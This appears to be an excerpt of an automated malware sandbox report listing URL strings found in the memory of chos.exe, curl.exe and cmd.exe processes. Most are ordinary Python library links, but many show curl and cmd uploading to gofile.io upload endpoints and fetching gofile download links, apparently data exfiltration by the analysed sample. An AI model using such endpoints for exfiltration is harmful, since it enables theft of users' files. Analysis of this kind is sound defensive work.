Source: chos.exe, 00000002.00000003.1478340357.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475894863.00000159554F4000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1471717663.000001595555C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1477382744.00000159554E8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1473331391.0000015955563000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475182879.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464161587.0000015955561000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466781370.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1474442517.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1479078693.00000159554EC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1476788640.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1472058557.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464863437.0000015955567000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1686397139.00000211B7B50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: chos.exe, 00000011.00000003.1674571294.00000211B77F5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1680761245.00000211B77FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: chos.exe, 00000011.00000003.1674571294.00000211B77F5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1680761245.00000211B77FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
Source: chos.exe, 00000011.00000003.1706710429.00000211B8253000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/astral-sh/ruff
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
Source: chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
Source: chos.exe, 00000002.00000003.1475946213.000001595504E000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1459809442.0000015955050000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1462947420.0000015955051000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1460938016.0000015955051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: chos.exe, 00000002.00000003.1478340357.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475894863.00000159554F4000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1477382744.00000159554E8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475182879.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1471998021.0000015955871000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466781370.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1474442517.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1479078693.00000159554EC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1476788640.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1472058557.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466452584.0000015955870000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1698106515.00000211B7BC3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1701143564.00000211B7BC3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1688635680.00000211B7C23000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1692731139.00000211B7BC3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687566933.00000211B7C23000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1689458854.00000211B7BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/issues
Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1709016306.00000211B81B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: curl.exe, 0000000D.00000003.1652229789.000001C952E28000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651751047.000001C952E80000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1652087177.000001C952E9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651140358.000001C952E67000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651140358.000001C952E80000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651140358.000001C952E9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651751047.000001C952E67000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1652087177.000001C952E80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/9ytA9K
Source: curl.exe, 00000023.00000003.1873169448.000002A688A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/Why0Ip
Source: curl.exe, 00000009.00000003.1626823097.000001791A33F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626666877.000001791A373000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626540508.000001791A373000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626666877.000001791A359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626757795.000001791A373000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626737616.000001791A33E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626540508.000001791A359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626784083.000001791A318000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1627252326.000001791A33F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626619878.000001791A33E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626937486.000001791A33F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/ZbU3df
Source: curl.exe, 00000010.00000003.1679585287.000001DB46BF3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1679151902.000001DB46BDA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1680521172.000001DB46BB4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1680399065.000001DB46B99000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1680072389.000001DB46B8D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1679836877.000001DB46BB3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1677790210.000001DB46BF3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1680521172.000001DB46B9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1679151902.000001DB46BF3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681979811.000001DB46BB4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1677790210.000001DB46BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/bFBKX1
Source: chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1706710429.00000211B81E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1706710429.00000211B81E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1709016306.00000211B81B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1738579625.00000211B81AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://importlib-metadata.readthedocs.io/
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
Source: chos.exe, 00000011.00000003.1709134987.00000211B7C72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: chos.exe, 00000011.00000003.1699028639.00000211B7FFE000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1694956038.00000211B8083000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: chos.exe, 00000011.00000003.1703493750.00000211B80F1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: chos.exe, 00000002.00000003.1454831606.0000015955021000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1684253672.00000211B7C23000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1671407326.00000211B77D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/cryptography/
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/importlib_metadata
Source: chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463649027.000001595553D000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: chos.exe, 00000002.00000003.1474920426.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464699665.0000015955808000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1476206451.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1473785976.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1477854412.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466452584.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463649027.000001595553D000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1684802316.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687566933.00000211B7C8A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1739472575.00000211B7CFC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687022873.00000211B7D12000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687448661.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1688348710.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1684802316.00000211B7C8A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1698029672.00000211B7CED000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1689458854.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1700987509.00000211B7CFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: chos.exe, 00000002.00000003.1463557293.00000159557A1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:
Source: chos.exe, 00000002.00000003.1463557293.00000159557A1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:r;Nr
Source: curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io.uploadFile
Source: curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io.uploadFile/
Source: cmd.exe, 00000007.00000002.1628124725.00000160E33CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1850416619.0000023A6EC6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/
Source: cmd.exe, 0000002F.00000002.1912110090.00000263A5EEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/J
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.1685480184.000001E547080000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.1687743998.00000170DB1E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1850416619.0000023A6EC6B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.1874357586.000001F529500000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile&29
Source: curl.exe, 0000000D.00000002.1653713527.000001C952E13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile2
Source: curl.exe, 00000010.00000003.1680521172.000001DB46BB4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.1679836877.000001DB46BB3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681979811.000001DB46BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile6
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile:
Source: curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile;
Source: curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile=
Source: curl.exe, 00000009.00000002.1627146371.000001791A2F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileB
Source: cmd.exe, 0000000B.00000002.1654909983.000001B935030000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.1874357586.000001F529500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileE_STRI
Source: cmd.exe, 00000007.00000002.1628124725.00000160E33C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileH
Source: cmd.exe, 0000000E.00000002.1682888587.000001376ACB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileRIe
Source: cmd.exe, 00000007.00000002.1628261798.00000160E36C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileSTRI
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileTEM32
Source: curl.exe, 00000009.00000002.1627146371.000001791A2F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileWinsta0
Source: curl.exe, 0000000D.00000003.1652926439.000001C952E42000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1653074745.000001C952E43000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileZ
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileal5
Source: curl.exe, 00000009.00000002.1627146371.000001791A301000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilecnwT
Source: curl.exe, 00000009.00000002.1627146371.000001791A2F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilecurl
Source: curl.exe, 00000009.00000002.1627146371.000001791A301000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilednxT
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilee28
Source: curl.exe, 00000010.00000002.1681576960.000001DB46B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileil
Source: cmd.exe, 0000002F.00000002.1912110090.00000263A5EEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilelesCommonProgramFiles(x86)=C:
Source: cmd.exe, 00000007.00000002.1628124725.00000160E33F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileo
Source: cmd.exe, 0000000B.00000002.1654510529.000001B934D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileqHv
Source: cmd.exe, 0000000B.00000002.1654510529.000001B934D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilerHw
Source: curl.exe, 00000009.00000002.1627252326.000001791A333000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626937486.000001791A333000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626823097.000001791A332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFileuQUT
Source: curl.exe, 00000009.00000002.1627252326.000001791A333000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626937486.000001791A333000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626823097.000001791A332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFilezQJT
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
Source: chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
Source: chos.exe, 00000011.00000003.1703493750.00000211B80F1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1697091350.00000211B80F9000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
